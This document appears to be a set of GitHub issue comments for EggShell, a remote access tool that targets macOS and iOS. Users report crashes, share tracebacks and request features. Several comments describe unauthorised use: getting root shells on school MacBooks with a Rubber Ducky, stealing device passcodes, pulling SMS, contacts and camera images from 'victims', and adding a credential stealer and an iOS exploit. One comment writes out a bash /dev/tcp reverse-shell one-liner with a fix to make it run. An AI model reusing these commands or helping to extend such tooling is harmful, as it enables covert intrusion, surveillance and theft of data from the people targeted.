it's works only on iOS jailbroken if I have understand correctly... But if I try to code a backdoor for iOS with Xcode with system(""), there is a warning that warn me that system is deprecated from iOS 8...
It works the same also if there is this warn?
And could you also add no-ip compatibility for static ip address out of local network?

this is what I get !

[] Session 1 opened | root@USER MacBook Air 00.00.00.00
MultiSession> interact 1
[] type "help" for commands
root@USER MacBook Air> ls
something went wrong
MultiSession> sessions
[*] Total Sessions: 1
[Errno 22] Invalid argument

MultiSession>

What is happening ?? it worked before perfect, but now it doesn't for some reason :(

https://gyazo.com/e63fcc5f6bda9d7b151c671a383c24a2

Any fix?

hey, I've been getting a lot of root shells with the rubberducky from my school since they use macbook air. but almost half of the commands I make is "exec" since there is not so "many" ones included. Will there be more commands for macOS in the future? and the "screenshot" command doesn't work even if I have root access, I need to type "exec screencapture -x 1.png"

I get the below error from an iPhone 6S Plus via Safari trying to connect back to my mac

• Using iPad 2 (64GB) with iOS 9.3.3

• I press option one and the program will crash after going though setting up the LPORT

• If the program does not crash, it will freeze and not do anything and has to be closed via Task Manager.

I don't know what this error is but it should be fixed.

many functions of the payload can be executed without escalated permissions. All we need for this payload to work is merely a sandbox bypass. now with the new commit, it makes it that it freezes at connection which stops all other connections, with no warning + idk if the 5 second kill if not responding feature works.

Create directory named /tmp/lls / on ur local computer then connect to ios device and do lls /tmp/lls / and it will fail.

As long as this shell works only on a jailbroaken ios you can make a same shell for android??There's no shell for android so cool like this...

Yhx and sorry for my englesh

Any way to have this turned off?

Hi, It is possible to update this repo to support 10.x.x CVE-2017-2464 using https://www.exploit-db.com/exploits/41931/ ?

If the payload that was sent fails then you kill the multiserver.better connection handling is needed

Port 4444, 4445
User connects to 4444
New thread then listen again on 4444
Handshake
Payload sent with connection and we listen on 4445 for them back

4445:
We would handle the payload connections here with also multithreaded approaches

I have try to use this exploit on a VM with Mac OS X Sierra, but the responde is wrong error

Hello,I have understod that on a Mac you have just to run that bash script,but in ios exept writing aplications with that code how can i send the payload??

I own an ios 10 device non jailbroken....and i want to practise on it..
Thank you

MultiSession> Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/local/Cellar/python/2.7.13/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 801, in __bootstrap_inner
self.run()
File "/usr/local/Cellar/python/2.7.13/Frameworks/Python.framework/Versions/2.7/lib/python2.7/threading.py", line 754, in run
self.__target(*self.__args, **self.__kwargs)
File "/Users/username/EggShell/src/server/server.py", line 146, in multiServerListen
if session.uid == self.sessions[sx].uid:
AttributeError: 'NoneType' object has no attribute 'uid'

Hey, I use eggshell on both MacOS and Windows but after you guys "fixed the colors" there was no colors for windows anymore. It's all in white. Please fix!

command 'exploit' will try some good shit, like seeing if su or sudo exists and trying default passwords etc etc

I ran the eggsheel and press 3 and did the config
on my ios 9.1 ipad i went to 192.168.0.116 that the eggshell payload is listening on
but the moment i join that ip on the ipad this appears for 2 seconds and resets the console
https://gyazo.com/6df06c1c6aeef12425950adf3d70e625

csh

[PC:~] user% bash &> /dev/tcp/192.168.1.2/4444 0>&1
Ambiguous output redirect.
[PC:~] user% ^ no execution

zsh

user@PC[06:30:41] [~] 
-> % bash &> /dev/tcp/192.168.1.2/4444 0>&1
zsh: no such file or directory: /dev/tcp/192.168.1.2/4444
user@PC [06:30:44] [~] 
-> %  ^ no execution       

This is easily solved by wrapping the payload with

bash -c "<payload>"

This is wrong!

'something went wrong'
Error:
"Traceback (most recent call last):
File "eggshell.py", line 108, in
main()
File "eggshell.py", line 104, in main
menu()
File "eggshell.py", line 55, in menu
chooseoption
File "eggshell.py", line 90, in menuStartMultiServer
server.multiServer(sp[0],sp[1]);
File "/Users/USERNAME/Documents/Folders/EggShell/src/server/server.py", line 208, in multiServer
socket.socket(socket.AF_INET, socket.SOCK_STREAM).connect( (host,port))
File "/usr/local/Cellar/python/2.7.12_2/Frameworks/Python.framework/Versions/2.7/lib/python2.7/socket.py", line 228, in meth
return getattr(self._sock,name)(*args)
TypeError: an integer is required"

When I'm in a session and there's a new session getting connected I get kicked back to the "Multiserver menu" so I need to connect back to the session I was in.. this is pretty annoying if you are downloading something and you get kicked out of it just because there's a new session. Is this an issue or is this made on purpose?!

different approach for root shit
don't check for root in the installpro thing in espl binary
instead have a method to get uid
and check locally

make exec work on macos and ios by doing the following:

$cmd is command

system($cmd+" >/tmp/esplcmdoutput 2>&1")

and then send back file contents of /tmp/esplcmdoutput

if you do my latest master branch on pr #8 it will show the arg stuff and if you take the src/binaries/esplios and put it in ios along with the args.

is possible use with public ip?

I've been with this for days, can you help me? I am running this on VM.

Keep getting "Operation Timed Out" on iOS 10.2

if this RAT isn't given root already, we need a way to obtain root.

1. If the default password is still there, root.
2. If the substrate extension is installed, root.

#8 in this pull request the "waiting for connection" was fixed, the issue was writing to directories we had no permission to write to, which meant the rat had to be run as root.

we could probably make a little database that has a bunch of tools allowing us to do a command 'root' and it'd automatically determine iOS version + device to find a proper jailbreak tool, so in turn we could get root if not running as root. I understand this is a payload application 🤷‍♂️ but we could expand it

I think this is caused by any connection that isn't from Safari/an iPhone/iDevice.
Any fix?
`
←[0;36m[] ←[0;97mConnecting to 123.125.143.65
←[0;36m[] ←[0;97mdevice unrecognized
D573BA5A4EFFC3FB629308

←[0;36m[] ←[0;97mWaiting For Target...
←[0;36m[] ←[0;97mSending Payload
Traceback (most recent call last):
File "eggshell.py", line 744, in
main()
File "eggshell.py", line 741, in main
interactiveMenu()
File "eggshell.py", line 733, in interactiveMenu
chooseoption
File "eggshell.py", line 527, in menuCreateScript
promptServerRun(sp[0],sp[1])
File "eggshell.py", line 507, in promptServerRun
singleServer(host,port)
File "eggshell.py", line 476, in singleServer
session.listen(1,host,port)
File "eggshell.py", line 618, in listen
conn.send(preload)
File "D:\Python27\lib\socket.py", line 174, in _dummy
raise error(EBADF, 'Bad file descriptor')
socket.error: [Errno 9] Bad file descriptor

D:\Downloads\EggShell-master>`

There is a lot of errors on my sessions.. some commands either doesn't work or when commands are executed there will be a blank space and nothing happens. Netcat is working fine with no errors. I thought first it was some mistake I made on the script for the rubber ducky but It seems it isn't.
Thanks for reading. Hope this gets resolved :)

This has happened to me every time I try to use installpro.

Iphone 6
Ios 10.2
Latest Yalu beta

A victim could send incorrect data therefore breaking your server and disconnecting all clients.

How to replicate:

1. Create a server.
2. Connect with an OS X client that has no camera.
3. Execute the 'picture' command. You will get a message back about can't get file size.
4. Press enter again, and you'll get an error "we fucked up" and if the program doesn't crash, when you click enter again it will. This also affects multi-servers.
   How to fix:
   Make it that if there's an exception in data received, it will not kill your connection. (Catch the exception properly)

Issue

getpasscode command fails to return passcode

Expected behaviour

Return Passcode

Actual behaviour

Returns error "Input strings must be a multiple of 16 in length"

Steps to reproduce

1. Set device passcode to 4 digits e.g. 0000
2. Execute payload on target machine & connect back
3. run getpasscode command

First line in red:
Sub-Process /usr/libexec/cydia/cydo returned an error code (1)

Second line in red:
Subprocess post-installation script returned an error exit status 133

http://python.mila432.com Python for iOS 10 :)

ints are casted without checking

If you feel like adding this do you think it's possible to make a module out of this?

https://github.com/AlessandroZ/LaZagne

https://gyazo.com/6dce9d5e1cb6171ed03be197da55dd38
when using this command the session freezes and doesnt even take a picture on IOS
this problems applies to:
frontcam
backcam
getsms
getcontacts
getnotes

iphone 7 , 10.1.1
i tries also on ipad mini 1 ios 9.0.(something) still the same issue

this removes the "oops, couldn't get file size" check which means if someone does the picture "exploit" then it'll freak out because it didn't receive the error message.

i installed python on my ios using mterminal on 10.1.1
but whenever i do python eggshell.py it says i should do easy_install pycrypto but when i do that
it still exists that error
does anyone have any deb file for pycrypto? to run the py?

I'm using the last version but here it's my problem ervytime a client connect :
SET LHOST (Leave blank for 192.168.1.29)>
[] LHOST = 192.168.1.29
SET LPORT (Leave blank for 4444)>
[] LPORT = 4444
[] Listening on port 4444...
[] Connecting to 82...***
[*] device unrecognized
bash: no job control in this shell

[*] closing connection

This isn't really a issue but how much could this take and what could you do If you combine other scripts into eggshell.. maybe some metasploit features. ?!

make espl hook uikit which I believe will allow it to hook all applications which would fix keylog in apps?

Default settings. Iphone 4,4s. Safari. Doesn't work

When I try running commands on a victim that download something, for some reason it doesnt download them..... it will just drop the session...

User@User> download Screen Shot 2017-02-23 at 12.45.08 PM.png
[*]  file size: 96864
[*]  Downloading data/Screen Shot 2017-02-23 at 12.45.08 PM.png (95448/96864) bytes
MultiSession>
[*]  Session 6 opened | User@User IP.HERE
MultiSession> interact 6
User@User> picture
[*]  file size: 171211
[*]  Downloading data/isight20170302230542.jpeg (171211/171211) bytes
MultiSession>

EggShell> 1
SET LHOST (Leave blank for ---------)>
[*]  LHOST = ---------
SET LPORT (Leave blank for 4444)>
[*]  LPORT = 4444
[*]  Listening on port 4444...
[*]  Connecting to ---------
[*]  Detected OSX
[*]  Sending Payload
[*]  Waiting For Connection...

User is an admin. Any idea how I might debug this?

EDIT: Just to be clear, the client works on my computer and some others but not all.